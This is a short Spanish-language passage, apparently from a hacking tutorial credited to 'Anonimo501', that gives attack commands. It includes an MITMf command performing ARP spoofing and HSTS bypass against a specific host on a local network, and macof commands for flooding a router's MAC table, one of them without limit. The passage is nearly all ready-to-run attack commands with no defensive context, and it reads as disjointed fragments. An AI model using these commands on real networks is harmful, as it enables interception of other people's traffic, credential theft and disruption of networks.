sudo mitmf --spoof --arp --hsts -i wlan0 --gateway 192.168.1.1 --target 192.168.1.56
Luego se configura.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Para ejecutar la herramienta y hacer el desbordamiento de MAC en el RUTER tipeamos: sudo macof –i eth0 –n 10000
O para atacar sin un número limitado podemos tipear: sudo macof -i eth0